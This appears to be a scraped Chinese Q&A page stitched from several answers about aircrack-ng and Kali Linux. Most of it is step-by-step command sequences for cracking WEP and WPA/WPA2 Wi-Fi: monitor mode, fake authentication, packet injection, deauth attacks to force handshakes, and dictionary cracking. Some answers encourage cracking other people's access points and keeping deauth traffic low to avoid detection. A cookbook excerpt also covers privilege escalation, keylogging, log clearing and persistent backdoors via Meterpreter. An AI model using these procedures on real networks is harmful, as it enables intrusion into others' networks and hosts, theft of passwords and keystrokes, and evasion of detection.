有无wps没关系,都可以PIN试试,只有54 .一定PIN不了。2023-08-09 19:08:091
我的也出现airodump中显示no adapters have been detected,
不是外置网卡吧,airodunp是识别不出内置的,希望对你有帮助2023-08-09 19:08:161
怎样设置无线网卡的监听模式
kali无线网卡可通过以下方式开启监听模式:1、在设置监听模式前先输入airmon-ngcheckkill结束进程;2、载入网卡airmon-ngstartwlan0(网卡名);3、电脑会自动创建一个wlan0mon接口;4、建立监听airodump-ngwlan0mon,即可完成kali无线网卡开启监听模式。2023-08-09 19:08:341
适合atheros ar928x wireless network adapter网卡的airodump驱动?
楼主您好笔记本什么牌子的?你的无线既然是AtherosAR928X,那你为什么装英特尔(R)PROSet/无线??完全没有必要装这个东西啊,直接下载Atheros的无线驱动即可。http://www.drvsky.com/acer/Aspire_4937G_WLAN.htm不知道你的笔记本牌子,下载这个Atheros无线驱动,这个是比较新的了。如果您还有不明白的地方可以给我发送邮箱:service@helpton.com2023-08-09 19:08:411
aircrack破解无线网络开启监听后没有显示mon0
用aircrack-ng 破解无线网络时的问题?程序员必上的开发者服务平台 —— DevStore ireplay-ng -1 0 -a aa:aa:aa:aa:aa:aa -h xx:xx:xx:xx:xx:xx mon0 12:22:14 Waiting for beacon frame (BSSID: 00:23:CD:6D:C3:16) on channel -1 12:22:14 mon0 is on channel -1, but the AP uses channel 6执行第4步时就出了上述的问题了。。。破解过程 :先安装:yum install aircrack-ng 1、在终端中输入 sudo airmon-ng start wlan0 启动无线网卡的监控模式 wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看。 2、在终端中输入 sudo airodump-ng mon0 (特别说明:启动监控模式后无线网的端口现在是 mon0 ) 看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端. 3、另开一个终端,输入 sudo airodump-ng --channel 6 --bssid AP"s MAC -w wep mon0 -c后面跟着的6是要破解的AP工作频道, --bissid后面跟着的AP"s MAC是要欲破解AP的MAC地址, -w后面跟着wep的是抓下来的数据包DATA保存的文件名, 具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名抓包。 4、再另开一个终端,输入 sudo aireplay-ng -1 0 -a AP"s_MAC -h My_MAC mon0 与AP建立虚拟连接 -h后面跟着的My MAC是自己的无线网卡的MAC地址, -1 fakeauth count 伪装客户端连接 5、建立虚拟连接成功后,输入 sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP"s MAC -h My MAC mon0 进行注入,现在回头看下步骤3的终端是不是DATA在开始飞涨! 6、收集有5000个以上的DATA之后,另开一个终端,输入 sudo aircrack-ng wep*.cap 进行解密 如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至 7、破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。 现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。2023-08-09 19:08:481
kali linux里的aircrack-ng怎么用
kali linux里的aircrack-ng怎么用 (1)在虚拟机器环境中是不支援物理主机的无线网络卡的,需自己配置可用的外接无线网络卡.(2)如果kali是直接安装到电脑上的话,在kali的命令列下输入命令:ifconfig查询网路装置以及配置的引数,在显示结果中找一下有没有wlan0,如果没有的话,那么airmonng肯... 怎么用android实现aircrack-ng?, aircrack ng怎么用 额。。这个本来就是在命令列下面的程式啊。。所以直接开启是木有用的(因为木有引数) 所以要用cmd开启,并新增相应的引数才行。 具体引数什么的我就不知道了…… 树莓派3 kali linux的aircrack-ng有相关教学吗 软体的使用方法完全一样,只是编译后二进位制程式码不一样罢了,通用的软体,什么教程不可以用? ubuntu怎么安装aircrack-ng 安装所需套件安装所需套件sudo apt-get updatesudo apt-get upgradesudo apt-get install build-essential安装aircrack-ngwget :download.aircrack-ng./aircrack-ng-1.0-rc4.tar.gztar -zxvf aircrack ... 安装所需套件安装所需套件 sudo apt-get update sudo apt-get upgrade sudo apt-get install build-essential 安装aircrack-ng wget :download.aircrack-ng./aircrack-ng-1.0-rc4.tar.gz tar -zxvf aircrack-ng-1.0-rc4.tar.gz cd aircrack-ng-1.0-rc4 make make install aircrack ng for windows怎么用? :wenku.baidu./link?url=SfOc2hl0hB-xo9PhjQfXPLemBgg1aj1fV54AW39sk0cJ8_AgCc1_6hb6Lx5aQCF4lgv9Y0kMYbkA6akEu0TNg2-2-PHHsl6pQGW_NB2X_fu建议用linux玩crack... 如何将kali中aircrack-ng抓到的.cap档案汇出 有三种方式启 - 直接在电脑上安装kali linux,然后执行 - 将kali刻入光碟或行动硬碟,直接以live模式执行kali linux 映象。 - 使用虚拟机器(vmvare或virtualbox之类),按照以上任意两种方式执行kali 注:我使用的是将kali刻盘,然后以live模式启动的方式。因为在硬碟上安装kali比较费劲,使用虚拟机器只能挂载USB 无线网络卡,而无法挂载笔记本的内建无线网络卡。 另外,需保证你的无线网络卡是支援monitor模式和injection的。 airodump-ng和aircrack-ng的区别 在Mac下面使用Aircrack-ng要解决的两个问题:Aircrack-ng在Mac下如何安装。 使用airport而不是Aircrack-ng中的工具获取握手包。 1.Aircrack-ng在Mac下编译的问题。 直接使用make原始码有问题,可以使用Macport进行安装。 Macport已经预置了Aircrack-ng,brew没有。 安装好Macport之后,命令列下:sudoportinstallaircrack-ng,Macport会自动下载编译和安装。 2.获取握手包的问题。 Mac下面使用Aircrack-ng包中的airmon-ng进行嗅探有问题,会提示wireless-tools找不到,因为Airmon-ng依赖于wireless-tools,而Linuxwireless-tools在Mac下的编译也有问题。 如果使用wireshark的Monmode也有问题,wireshark的监听模式认为Mac的网络卡不支援监听模式。 其实Mac本身自带一个airport工具,可以很方便的扫描和在监听模式下进行监听:airport-s进行扫描,airporten1sniff1进行监听。 Kali Linux怎么用airodump-ng得到握手包 建议楼主用aircrack-ng工具包获取握手包。 使用方法:1、下载aircrack-ng工具包。 2、终端里输入 sudo airomon-ng stat wlan0 启动资料监控模式。 3、终端里输入 sudo airodump -w wpa mon0 ( 此时监控埠应该为 mon0 ,DATA储存到以wpa命名的档案中了)。 4、依次:网路连线图示->点滑鼠左键->滑鼠移到要抓取握手资料包的AP上面点左键->。 5、这时AP会提示你填入密码,随便填8个数字或字母进去,然后点选连线。 6、现在可以看到网路连线正在尝试连线无线AP,回头看下步骤3的终端,DATA已经变为4个了。 7、再开启一个新的终端,输入 sudo aircrack-ng wpa*.cap 会看到里面有一个握手包了。 不要点 s 如果点了s,握手包就会丢失 。。 获得握手包后,bini提示你跑字典,你点否,bini显示握手包路径,然后去找就可以了 希望你成功,不过握手包不是问题,关键是你能否跑出密码来,这是国际难题。。。 2011-08-14 Beini-1.2.3 --- FeedingBottle 更新至3.2.1:修复桌面滑鼠右键选单无法执行程式的错误。 --- 增加驱动和韧体包 "x_rtl8188ru_20110812.tce",支援Realtek8188RU。 --- 删除: "x_ath9k_htc_pat-wireless-2.6.38-rc4-1.tce","firmware.tcz"。 --- 提示:本版本针对 Realtek8188RU 晶片开发,非此晶片的使用者不建议使用。 在无客户端进行伪连线操作时,请使用暴力伪连线方式,即:"Fake Auth(by force)", 而不是普通的"Fake Auth(-1)"。 如何用aircrack-ng破解wifi 用电脑破,陶宝买个清冷的晚风卡王,自己附近讯号都可以扫描破开,别买到山寨的就行,很给力别说我没告诉你2023-08-09 19:08:551
Atheros的AR928X网卡用的是什么芯片?
AR928x是一个系列,都是支持PCIe,有AR9280, AR9283,AR9285,AR9287等芯片.2023-08-09 19:09:092
Kali Linux 秘籍 第七章 权限提升
我们已经获得了想要攻击的计算机的权限。于是将权限尽可能提升就非常重要。通常,我们能访问较低权限的用户账户(计算机用户),但是,我们的目标账户可能是管理员账户。这一章中我们会探索几种提升权限的方式。 这个秘籍中,我们会通过使用模拟令牌,模拟网络上的另一个用户。令牌包含用于登录会话和识别用户、用户组合用户权限的安全信息。当用户登入 Windows 系统是,它们会得到一个访问令牌,作为授权会话的一部分。令牌模拟允许我们通过模拟指定用户来提升自己的权限。例如,系统账户可能需要以管理员身份运行来处理特定的任务。并且他通常会在结束后让渡提升的权限。我们会使用这个弱点来提升我们的访问权限。 为了执行这个秘籍,我们需要: 我们从 Meterpreter 开始探索模拟令牌。你需要使用 Metasploit 来攻击主机,以便获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得访问权限。 下面是具体步骤: 这个秘籍中,我们以具有漏洞的主机开始,之后使用 Meterpreter 在这台主机上模拟另一个用户的令牌。模拟攻击的目的是尽可能选择最高等级的用户,最好是同样跨域连接的某个人,并且使用它们的账户来深入挖掘该网络。 这个秘籍中,我们会在一台具有漏洞的主机上进行提权。本地提权允许我们访问系统或域的用户账户,从而利用我们所连接的当前系统。 为了执行这个秘籍,我们需要: 让我们在 Meterpreter shell 中开始执行本地提权攻击。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得主机的访问。 这个秘籍中,我们使用了 Meterpreter 对受害者的主机进行本地提权攻击。我们从 Meterpreter 中开始这个秘籍。之后我们执行了 getsystem 命令,它允许 Meterpreter 尝试在系统中提升我们的证书。如果成功了,我们就有了受害者主机上的系统级访问权限。 这个秘籍中,我们会探索社会工程工具包(SET)。SET 是个包含一些工具的框架,让你能够通过骗术来攻击受害者。SET 由 David Kennedy 设计。这个工具很快就成为了渗透测试者工具库中的标准。 掌握 SET 的步骤如下所示。 这个秘籍中,我们探索了 SET 的用法。SET 拥有菜单风格的接口,使它易于生成用于欺骗受害者的工具。我们以初始化 SET 开始,之后,SET 为我们提供了几种攻击方式。一旦我们选择了它,SET 会跟 Metasploit 交互,同时询问用户一系列问题。在这个秘籍的最后,我们创建了可执行文件,它会提供给我们目标主机的 Meterpreter 活动会话。 作为替代,你可以从桌面上启动 SET,访问 Applications | Kali Linux | Exploitation Tools | Social Engineering Tools | Social Engineering Toolkit | Set 。 将你的载荷传给受害者 下面的步骤会将你的载荷传给受害者。 这个秘籍中,我们会探索如何使用 Metasploit 来收集受害者的数据。有几种方式来完成这个任务,但是我们会探索在目标机器上记录用户击键顺序的方式。收集受害者数据可以让我们获得潜在的额外信息,我们可以将其用于进一步的攻击中。对于我们的例子,我们会收集目标主机上用户输入的击键顺序。 为了执行这个秘籍,我们需要: 让我们开始通过 Meterpreter shell 来收集受害者数据。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。 这个秘籍中,我们使用 Meterpreter 收集了受害者的数据。 有一种不同的方式,你可以使用它们来收集受害者机器上的数据。这个秘籍中,我们使用了 Metasploit 和 Metasploit keyscan 来记录击键顺序,但是我们也可以使用 Wireshark 或 airodump-ng 来更简单地收集数据。 这里的关键是探索其它工具,便于你找到最喜欢的工具来完成你的目标。 这个秘籍中,我们会使用 Metasploit 来清除我们的踪迹。在黑进主机之后执行清理是个非常重要的步骤,因为你不想在经历所有麻烦来获得访问权限之后还被人查水表。幸运的是,Metasploit 拥有一种方式来非常简单地清除我们的踪迹。 为了执行这个秘籍,我们需要: 需要执行步骤如下所示: 这个秘籍中,我们使用 Meterpreter 来清理我们在目标主机上的踪迹。我们从 Meterpreter 中开始这个秘籍,并启动了 IRB(一个 Ruby 解释器 shell)。下面,我们指定了想要清理的文件,并且最后键入了 Log.clear 命令来清理日志。要记住,一旦我们黑进了某个主机,你需要在最后执行这一步。你不能在清理踪迹之后再执行更多的操作,这样只会更加更多的日志条目。 这个秘籍中,我们会使用 Metasploit persistence 来创建永久后门。一旦你成功获得了目标机器的访问权限,你需要探索重新获得机器访问权的方式,而不需要再次黑进它。如果目标机器的用户做了一些事情来终端连接,比如重启机器,后门的作用就是允许重新建立到你机器的连接。这就是创建后门非常方便的原因,它可以让你控制目标机器的访问。 为了执行这个秘籍,我们需要: 让我们开始植入我们的永久后门。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。 这个秘籍中,我们使用 Meterpreter 来建立永久后门。我们在黑进目标主机并获得 Meterpreter shell 之后开始了这个秘籍。之后我们通过浏览帮助文档那个,探索了一些可用的永久化方式。最后,我们通过运行安装命令并设置它的选项来完成后门的安装。 这个秘籍中,我们会对目标进行中间人(MITM)攻击。MITM攻击允许我们窃听目标和别人的通信。在我们的例子中,当某个 Windows 主机在 http://www.yahoo.com 收发邮件时,我们使用 Ettercap 来窃听它的通信。 为了执行这个秘籍,我们需要: 让我们启动 Ettercap 来开始中间人攻击。 这个秘籍包括 MITM 攻击,它通过 ARP 包毒化来窃听由用户传输的无线通信。2023-08-09 19:09:181
kali linux ~#airmon-ng commands not found 求解决
1.首先我们需要安装libssl-dev,如果不安装这个文件,我们运行aircrack时候会出现错误。apt-get -y install libssl-dev libnl-3-dev libnl-genl-3-dev ethtool2.接下来,首先确定你的电脑或树莓派连接网络,并且按照线面步骤进行。wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc3.tar.gztar -zxvf aircrack-ng-1.2-rc3.tar.gzcd aircrack-ng-1.2-rc3sudo makesudo make install3.安装完aircrack之后要升级IEEE OUI文件。sudo airodump-ng-oui-update2023-08-09 19:09:282
如何使用Kali Linux破解WPA或WPA2无线局域网
目录部分1:准备工作1、了解在什么情况下可以合法破解无线局域网。2、下载Kali Linux磁盘镜像。3、将U盘插入电脑。4、制作可启动U盘5、将Kali Linux ISO文件复制到U盘上。6、安装Kali Linux。7、购买支持监听模式的无线网卡。8、以root用户身份登录Kali Linux电脑。9、将无线网卡插入Kali Linux电脑。部分2:破解无线局域网1、打开Kali Linux电脑上的"终端"应用程序。2、输入Aircrack-ng安装命令。3、出现提示时输入密码。4、安装Aircrack-ng。5、开启airmon-ng。6、找到监听接口名称。7、开始监听网络。8、启用监听模式接口。9、终止返回错误的进程。10、复查监听接口的名称。11、让电脑监听附近的路由器。12、找到要破解的路由器。13、确保路由器使用的是WPA或WPA2加密方式。14、记住路由器的MAC地址和信道号。15、监听所选网络以抓取握手包。16、等待握手。17、退出airodump-ng,然后打开桌面。18、重命名".cap"文件。19、将".cap"文件转换为"hccapx"格式。20、安装naive-hashcat。21、运行naive-hashcat。22、等到网络密码破解完成。部分3:在没有独显的电脑上使用Aircrack-Ng1、下载字典文件。2、通过aircrack-ng破解密码。3、等待"终端"显示结果。部分4:使用Deauth攻击强制握手1、了解Deauth攻击的机制。2、监听网络。3、等待设备连接网络。4、打开新的"终端"窗口。5、发送Deauth包。6、重新打开原"终端"窗口。7、搜索握手包。本指南介绍如何通过Kali Linux破解WPA或WPA2网络的密码。部分1:准备工作1、了解在什么情况下可以合法破解无线局域网。在大部分地区,你只能破解自己的WPA或WPA2网络,或在明确获得同意的情况下破解别人的网络。如果不符合上述条件,破解将被视为非法,甚至可能构成犯罪。2、下载Kali Linux磁盘镜像。要破解WPA或WPA2网络,首推使用Kali Linux。你可以通过以下方式下载Kali Linux安装镜像(ISO):在电脑浏览器中前往https://www.kali.org/downloads/。找到要使用的Kali版本,然后单击旁边的HTTP。等待文件下载完成。3、将U盘插入电脑。U盘至少要有4GB的存储空间。4、制作可启动U盘。只有这样才能选择U盘作为安装位置。还可以使用Mac来制作启动盘。5、将Kali Linux ISO文件复制到U盘上。打开U盘,然后将下载的Kali Linux ISO文件拖曳到U盘窗口中。完成后不要拔出U盘。6、安装Kali Linux。要在电脑上安装Kali Linux,按以下步骤操作:重启Windows。进入BIOS菜单。找到"启动选项"或类似的选项,选项U盘名称,然后移到列表的顶部,这样就可以从U盘启动电脑了。保存并退出,然后等待Kali Linux安装窗口出现。之后可能还需要再重启一次电脑。按照Kali Linux安装窗口中的提示操作。7、购买支持监听模式的无线网卡。可以在网上买或去电子商店买。一定要买支持监听(RFMON)的无线网卡,否则无法破解网络。很多电脑内置RFMON无线网卡,在购买前可以先试试下一节中的前四个步骤。如果是在虚拟机上使用Kali Linux,无论电脑本身是否内置了无线网卡,都需要购买RFMON无线网卡。8、以root用户身份登录Kali Linux电脑。输入root用户名和密码进行登录。整个破解过程都需要root帐户。9、将无线网卡插入Kali Linux电脑。随后会立即开始安装网卡并下载驱动。如果看到提示,按屏幕上的说明完成安装。完成后,就可以开始进行网络破解了。即使之前曾在电脑上安装过该网卡,插入后仍需要在Kali Linux上重新安装。大部分情况下,只需要将网卡插入电脑就能完成安装。部分2:破解无线局域网1、打开Kali Linux电脑上的"终端"应用程序。找到并单击"终端"应用程序,图标是一个中间带有白色"$_"图案的黑色方块。也可以按Alt+Ctrl+T来打开"终端"。2、输入Aircrack-ng安装命令。输入以下命令,然后按? Enter:sudo apt-get install aircrack-ng3、出现提示时输入密码。输入电脑的登录密码,然后按? Enter。这样就可以使用root权限在"终端"中执行命令。如果稍后根据本文中的说明打开了另一个"终端"窗口,可能还需要运行sudo命令和/或再次输入密码。4、安装Aircrack-ng。出现提示时输入Y,然后等待程序完成安装。5、开启airmon-ng。输入以下命令,然后按? Enter。airmon-ng6、找到监听接口名称。它位于"Interface"列中。如果破解的是自己的网络,名称通常是"wlan0"。如果没有看到监听接口,无线网卡可能不支持监听。7、开始监听网络。输入以下命令,然后按? Enter开始监听:airmon-ng start wlan0将"wlan0"替换为目标网络的名称。8、启用监听模式接口。输入以下命令:iwconfig9、终止返回错误的进程。某些情况下,无线网卡会和电脑上运行的服务冲突。输入以下命令终止这些进程:airmon-ng check kill10、复查监听接口的名称。大部分情况下,名称类似"mon0"或"wlan0mon"。11、让电脑监听附近的路由器。要获取附近的路由器列表,输入以下命令:airodump-ng mon0将"mon0"替换为上一步中的监听接口名称。12、找到要破解的路由器。在每一行字符串的末尾都有一个名称,找到要破解的网络名称。13、确保路由器使用的是WPA或WPA2加密方式。如果在网络名称旁看到"WPA"或"WPA2",可以继续下一步骤,否则就无法破解网络。14、记住路由器的MAC地址和信道号。这些信息在网络名称的左侧:MAC地址——它是路由器所在行最左侧的一串数字。信道——它是WPA或WPA2标记左侧的数字,比如0、1、2等。15、监听所选网络以抓取握手包。有设备连接网络时就会发生"握手",比如电脑连接路由器时。输入以下代码,注意将命令中的以下部分替换为网络的实际信息:airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0将"channel"替换为上一步中找到的信道号。将"MAC"替换为上一步中找到的MAC地址。将"mon0"替换为实际的接口名称。以下为地址示例:airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon16、等待握手。看到屏幕右上角出现"WPA handshake: <Mac地址>"的提示后,继续下一步。如果不想等待,可以使用Deauth攻击强行握手,然后再继续下一步。17、退出airodump-ng,然后打开桌面。按Ctrl+C退出,检查电脑桌面上是否有".cap"文件。18、重命名".cap"文件。改名的目的是方便你稍后找到它,但也可以不改。输入以下命令更改名称,注意将"name"替换为期望的名称:mv ./-01.cap name.cap如果".cap"文件的当前名称不是"-01.cap",将它替换为实际的名称。19、将".cap"文件转换为"hccapx"格式。可以使用Kali Linux的转换工具来转换。输入以下命令,注意将"name"替换为文件名称:cap2hccapx.bin name.cap name.hccapx还可以前往https://hashcat.net/cap2hccapx/,然后单击 Choose File(选择文件)将".cap"文件上传到转换工具。完成后,单击Convert(转换)进行转换,将转换的文件下载到桌面,然后继续下一步。20、安装naive-hashcat。你将它用来破解密码。按顺序输入以下命令:sudo git clone https://github.com/brannondorsey/naive-hashcatcd naive-hashcatcurl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt如果电脑上没有独显,需要改用aircrack-ng。21、运行naive-hashcat。安装完成后,输入以下命令,注意将所有"name"替换为".cap"文件的名称:HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hashcat.sh22、等到网络密码破解完成。密码被破解后,"naive-hashcat"目录下的"name.pot"文件中会多出一个字符串,字符串中的最后一个分号后的文字或短语就是密码。破解密码所需的时间从几小时到几个月不等。部分3:在没有独显的电脑上使用Aircrack-Ng1、下载字典文件。最常用的是"Rock You"。可以输入以下命令下载它:curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt注意,如果WPA或WPA2密码不在字典里,aircrack-ng就无法破解。2、通过aircrack-ng破解密码。输入以下命令,根据需要替换以下网络信息:aircrack-ng -a2 -b MAC -w rockyou.txt name.cap如果破解的不是WPA2网络,而是WPA网络,将"-a2"替换为-a。将"MAC"替换为上一节中找到的MAC地址。将"name替换为".cap"文件的名称。3、等待"终端"显示结果。如果看见"KEY FOUND!"标题,就代表aircrack-ng找到了密码。密码显示在此标题右侧的括号中。部分4:使用Deauth攻击强制握手1、了解Deauth攻击的机制。Deauth攻击会向你尝试破解的路由器发送恶意的取消身份验证包,从而造成网络断线并要求用户重新登录。一旦用户登录,你就能获得握手包。2、监听网络。输入以下命令,根据需要输入网络信息:airodump-ng -c channel --bssid MAC比如:airodump-ng -c 1 --bssid 9C:5C:8E:C9:AB:C03、等待设备连接网络。看到两个连续的MAC地址以及包含生产商名称的字符串后,继续下一步。这表示已有客户端连接网络,比如电脑。4、打开新的"终端"窗口。按Alt+Ctrl+T就可以打开。在原本的"终端"窗口中继续运行airodump-ng。5、发送Deauth包。输入以下命令,注意将以下部分替换为实际的网络信息:aireplay-ng -0 2 -a MAC1 -c MAC2 mon0"2"是指发送的数据包数量。可以增加或减少,但要注意,超过2个包可能会让对方察觉到有人在入侵。将"MAC1"替换为原"终端"窗口底部最左侧的MAC地址。将"MAC2"替换为原"终端"窗口底部最右侧的MAC地址。将"mon0"替换为电脑最初搜索路由器时找到的接口名称。以下是命令示例:aireplay-ng -0 3 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon06、重新打开原"终端"窗口。在发送deauth包后,返回原"终端"窗口。7、搜索握手包。在找到"WPA handshake: <地址>"后,继续破解网络。小提示在启动服务器前,用此方法测试无线局域网中的漏洞,这样可以预防类似攻击。警告擅自破解其他人的无线局域网在大部分国家都是违法行为。只能对自己的网络,或明确同意你测试的网络执行上述步骤。发送两个以上的Deauth包可能会造成目标电脑崩溃,这样会让对方起疑。2023-08-09 19:09:371
求教高手帮忙破解WPA2的握手包
WPA破解详细教程破解 WPA 的前提:必须要有合法无线客户端WPA 破解的原理:利用Deauth验证攻击。也就是说强制让合法无线客户端与AP被断开,当它被从WLAN 中断开后,这个无线客户端会自动尝试重新连接到AP上,在这个重新连接过程中,数据通信就产生了,然后利用airodump捕获一个无线路由器与无线客户端四次握手的过程,生成一个包含四次握手的cap包。然后再利用字典进行暴力破解。1. 激活网卡,并让其工作于11信道Airmon-ng start wifi0 112.捕获11信道的cap包,并保存cap包为123.capAirodump-ng –w 123 –c 11 wifi0上图可以看出采用了WPA加密方式,并且有一个0016b69d10ad合法的无线客户端。3. 进行Deauth验证攻击,强制断开合法无线客户端和AP直接的连接,使其重新进行连接aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0解释:-0指的是采取Deautenticate攻击方式,后面为发送次数。-c建议还是使用,效果会更好,这个后面跟的是监测到的合法的已连接的客户端MAC地址注意上图红色部分,-c后面为合法无线客户端的MAC地址Deauth攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行(WPA破解不用等到数据Data达到几万,因为它只要一个包含WPA4次握手验证包就可以了)。如果成功捕获会出现下图红色部分的提示中国无线论坛中卫出品AnywhereWLAN!! 25这时如果输入dir就可以在root目录下看到名为123.cap的握手包了。得到握手包以后就可以用字典直接破解首先将在windows下用字典工具生成的字典(例password.txt)拷贝到root目录下在BT3桌面双击system然后出现下图。图中左边红色就为root目录,图中红色存储介质双击打开以后就看到你的每个硬盘的分区了。可以进入硬盘分区右键拷贝,然后进入root目录右键粘贴。如下图红色部分目前WPA 的破解主要还是基于暴力破解和字典破解,暴力破解和字典破解的一个共性就是“耗时、费力、运气”所以往往有时候你花了很多时间但还是破不了,这时候希望大家还是要接受这样一个残酷的现实。中国无线论坛中卫出品AnywhereWLAN!! 26破解方式一:用Cap数据包直接暴力破解从破解难度上讲WEP 是很容易破解的,只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。输入:aircrack-ng -z –b <ap mac> 123*.cap123 是前面所获得的握手包的文件名。系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,系统会自动分成几个文件存储并自动命名,可以使用ls查看),输入123*是打开所有123相关的cap文件。常见问题:步骤2中收集数据包已达30W,无法破解密码。可能系统自动分成了几个文件贮存cap包。如输入123-01.cap破解可能导致破解不成功,建议使用123*.cap选择所有的cap包进行破解。中国无线论坛中卫出品AnywhereWLAN!! 27破解方式二. 挂字典破解一.直接在BT3中挂字典破解aircrack-ng –w password.txt –b <ap mac> 123.cap参数说明:passwrod.txt为字典名称123.cap为步骤2中获得的握手信息包耗时1分31秒获得WPA密码,如下图从上图可以看出破解用时1分31秒,速度149.91K/S注:本教程只为了描述破解的过程。我是做了个256K的小字典,事先把密码已经加到字典里了。二.也可以把包含4次握手的CAP数据包拷贝到硬盘下在WIN下用WinAircrack挂字典破解。中国无线论坛中卫出品AnywhereWLAN!! 28如上图 Encryption type处选择WPA-PSK,下面capture files处导入抓取的握手包123.cap然后选择WPA选项,如下图在上图中Dictionary file处导入字典文件password.txt。然后点击右下角的Aircrack the key中国无线论坛中卫出品AnywhereWLAN!! 29然后出现下图提示上图,选择1后回车,然后开始破解。成功破解如下图从上图可以看出破解用时54秒,速度251.73K/S(比BT3下要快)中国无线论坛中卫出品AnywhereWLAN!! 30三.通过airolib构建WPA table实现WPA线速破解WPA的字典破解除了直接挂字典破解外,另外一种就是用airolib将字典构造成WPA table然后再用aircrac进行破解。构建WPA table就是采用和WPA加密采用同样算法计算后生成的Hash 散列数值,这样在需要破解的时候直接调用这样的文件进行比对,破解效率就可以大幅提高。先讲通过airolib构建WPA tableWPA table具有较强的针对ssid的特性。1. 在构建WPA table之前需要准备两个文件:一个是ssid列表的文件ssid.txt,一个是字典文件password.txt。下图为我的文件大家可以看到两个txt的文件,ssid记事本里是ssid的列表,你可以增加常见的ssid进去,后面的passwrod就是字典文件了。2. 把这ssid.txt和password.txt还有上面抓到的握手包123.cap这三个文件拷贝到root目录下方便使用。见下图3.开始利用airolib-ng来构建WPA table了。构建wpa table保存的名字为wpahash(下同)第一步,如下图airolib-ng wpa --import essid ssid.txt中国无线论坛中卫出品AnywhereWLAN!! 31第二步,如下图airolib-ng wpa --import passwd password.txt第三步,如下图airolib-ng wpa --clean all第四步,如下图airolib-ng wpa --batch注:这一步要等很久(视字典大小而定,我256K的字典等了有15分钟)4. 用aircrack来利用WPA table进行破解Aircrack-ng –r wpahash 123.cap选择1以后将开始破解。中国无线论坛中卫出品AnywhereWLAN!! 32成功破解将如下图所示从上图中可以看出耗时00:00:00反正不超过1秒钟,速度42250.00K/S大家也看到了三种破解方式,直接挂字典中在win下用WinAircrack破解是速度比在BT3下要快。直接挂字典破解不超过1分钟就破出了密码;利用WPA table破解速度虽然不到一秒,但是构建WPA table却耗费了15分钟。构建WPA table是很耗时的,但是构建出了包括常见ssid的和相对较大字典的WPA table的话,以后破解的速度将大大降低。当然没有万能的字典,如果有万能的字典,再构建出一个常见ssid的WPA table的话那这个预运算数据库是超级超级庞大的。注:WIN平台下的CAIN软件中的破解器也可用于WEP和WPA的基于暴力和字典的破解,但是其破解速度很慢,相比aircrack-ng而言不具实用价值。中国无线论坛中卫出品AnywhereWLAN!! 33Aireplay-ng的6种攻击模式详解-0 Deautenticate 冲突模式使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效ARP request。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效ARPrequest。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0参数说明:【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网)【-a】:设置ap的mac【-c】:设置已连接的合法客户端的mac。如果不设置-c,则断开所有和ap连接的合法客户端。aireplay-ng -3 -b <ap mac> -h <my mac> wifi0注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器-1 fakeauth count 伪装客户端连接这种模式是伪装一个客户端和AP进行连接。这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生ARP包。aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0参数说明:【-1】:伪装客户端连接模式,后面跟延时【-e】:设置ap的essid【-a】:设置ap的mac【-h】:设置伪装客户端的网卡MAC(即自己网卡mac)-2 Interactive 交互模式这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0参数说明:【-2】:交互攻击模式【-p】设置控制帧中包含的信息(16进制),默认采用0841【-c】设置目标mac地址【-b】设置ap的mac地址【-h】设置伪装客户端的网卡MAC(即自己网卡mac)2.提取包,发送注入数据包aireplay-ng -2 –r <file> -x 1024 wifi0发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择1024。中国无线论坛中卫出品AnywhereWLAN!! 34-3 ARP-request 注入攻击模式这种模式是一种抓包后分析重发的过程这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 